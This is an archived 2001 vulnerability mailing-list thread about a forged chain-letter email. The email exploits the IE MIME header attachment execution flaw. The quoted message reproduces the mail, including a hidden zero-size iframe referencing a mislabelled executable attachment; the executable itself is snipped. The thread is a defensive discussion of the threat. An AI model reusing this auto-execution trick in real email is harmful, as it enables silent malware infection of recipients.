Vulnerability Development mailing list archives
RE: A very dangerous mail...
From: Aidan O'Kelly <okelly () xnet ie>
Date: Mon, 23 Jul 2001 15:42:40 +0100
'Microsoft IE MIME Header Attachment Execution Vulnerability' It was discovered a couple months ago. If it was an exe it would have run, although since it asked you wheter you want to save it or run it, it means your system is patched anyway. Explanation and example. http://www.kriptopolis.com/cua/eml.html
-----Original Message----- From: Marius Huse Jacobsen [mailto:mahuja () c2i net] Sent: 20 July 2001 22:24 To: vuln-dev () securityfocus com Subject: A very dangerous mail... -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Edited to protect any innocents. Obvious forgery (supposedly from microsoft.com) I'm using ZoneAlarm MailSafe -> .exe changed to .zl9 It tries to start the attachment exe automatically (Outlook Express) - - it asks me if I want to save or start the zl9 file but I don't know what it would do to an exe. Exactly how bad is it? The offending line seems to be <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> Html email was a curse to begin with and it hasn't become any better. Can anyone give me that ascii ribbon sig? 8< --------- Start offending letter ----------- Return-Path: <zina () somewhereonthenet com> Received: from smtp08.somewhereonthenet.com (smtp08.somewhereonthenet.com [196.*.*.*]) by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304 for <my () mail addy>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST) Received: from microsoft.com ([196.*.*.*]) by smtp08.somewhereonthenet.com (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GGG009BGSJHYE () smtp08 iafrica com> for my () mail addy; Sat, 14 Jul 2001 15:09:40 +0200 (SAT) Date: Sat, 14 Jul 2001 15:09:01 +0100 From: Lynda () smtp08 somewhereonthenet com Subject: Fw: 100,000 lemmings can't be ... To: removed () smtp08 somewhereonthenet com Message-id: <0GGG009BISJHYE () smtp08 somewhereonthenet com> MIME-version: 1.0 Content-type: multipart/mixed; boundary="nymph" This is a multi-part message in MIME format. - --nymph Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff> <iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe> <P align=center><FONT size=7><SPAN class=590014113-13042001>SMACK!!!</SPAN></FONT></P> <P align=center><FONT size=7><SPAN class=590014113-13042001>You have been hit</SPAN></FONT></P> <P align=center><SPAN class=590014113-13042001>This is the funny-attachment war! You have just been hit and by the rule book you can't hit this person back. To be in the game you need to send this message to five of your friends, try to find some small and funny attachment to send along. If you don't have time use the one you got hit by, go ahead hit someone!</SPAN></P> <P align=center><FONT size=7><SPAN class=590014113-13042001></SPAN></FONT> </P></BODY></HTML> - --nymph Content-Type: audio/x-wav; name="setup.zl9" Content-Transfer-Encoding: base64 Content-ID: <THE-CID> <snip .exe content> - --nymph <snip fortune.zip> - --nymph-- -----BEGIN PGP SIGNATURE----- Version: PGP 7.0.4 iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk sqjAlFfiJIKdd21U6wxArNXb =63JI -----END PGP SIGNATURE-----
_________________________________________ Aidan O'Kelly Systems Administrator okelly () xnet ie Xnet - The Data Storage People Dublin: +353 (1) 2740 100 Belfast: +44(28) 9073 5872 www.xnet.ie | storage () xnet ie ******************************************************************* Privileged/Confidential Information may be contained in this message. If you are not the addressee indicated in this message (or responsible for delivery of the message to such person), you may not copy or deliver this message to anyone. In such case, you should destroy this message and kindly notify the sender by reply email. Please advise immediately if you or your employer do not consent to Internet email for messages of this kind. Opinions, conclusions and other information in this message that do not relate to the official business of Xnet and shall be understood as neither given nor endorsed by it. ********************************************************************
Current thread:
- A very dangerous mail... Marius Huse Jacobsen (Jul 20)
- Re: A very dangerous mail... Nexus (Jul 25)
- <Possible follow-ups>
- RE: A very dangerous mail... Aidan O'Kelly (Jul 23)